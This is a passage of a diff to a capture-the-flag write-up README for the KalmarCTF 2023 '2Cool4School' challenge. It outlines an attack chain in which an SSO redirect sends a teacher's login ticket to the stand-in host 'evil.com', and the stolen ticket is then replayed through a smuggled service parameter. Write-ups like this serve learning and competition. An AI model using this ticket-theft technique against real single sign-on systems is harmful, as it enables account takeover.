omerAF/CTFs/kalmar2023/2Cool4School/README.md

 So right now, our attack chain looks something like this:

-1. Set the `picture` field in the profile picture upload `HTTP` request to a URL structured like this: `http://sso.chal-kalmarc.tf/login?service=http://evil.com`, in which `evil.vom` is a domain under our control.
+1. Set the `picture` field in the profile picture upload `HTTP` request to a URL structured like this: `http://sso.chal-kalmarc.tf/login?service=http://evil.com`, in which `evil.com` is a domain under our control.
 2. We will press the `whine` button which will make the teacher view the grades, sending a `GET` request to the URL specified above.
-3. Because the teacher is already logged in to the `sso` service, they should be redirected to `http://evil.com?ticket=TGT-1234...`, with a ticket valid for `http://evil.com`.
+3. Because the teacher is already logged in to the `sso` service, they should be redirected to `http://evil.com?ticket=TGT-1234...`, with a ticket valid for the account of the teacher and `http://evil.com`.
 4. We listen for incoming requests on `http://evil.com`, and when one comes we save the ticket attached to it.
 5. We then request the following URL from our own web browser, with the ticket we just got:  `http://grade.chal-kalmarc.tf/login?ticket=TGT-1234...%26service%3dhttp://evil.com%23`
 4. The `grade` site makes the following `GET` request to `http://sso.chal-kalmarc.tf/validate?ticket=TGT-1234...&service=http://evil.com#&service=http://grade.chal-kalmarc.tf/login`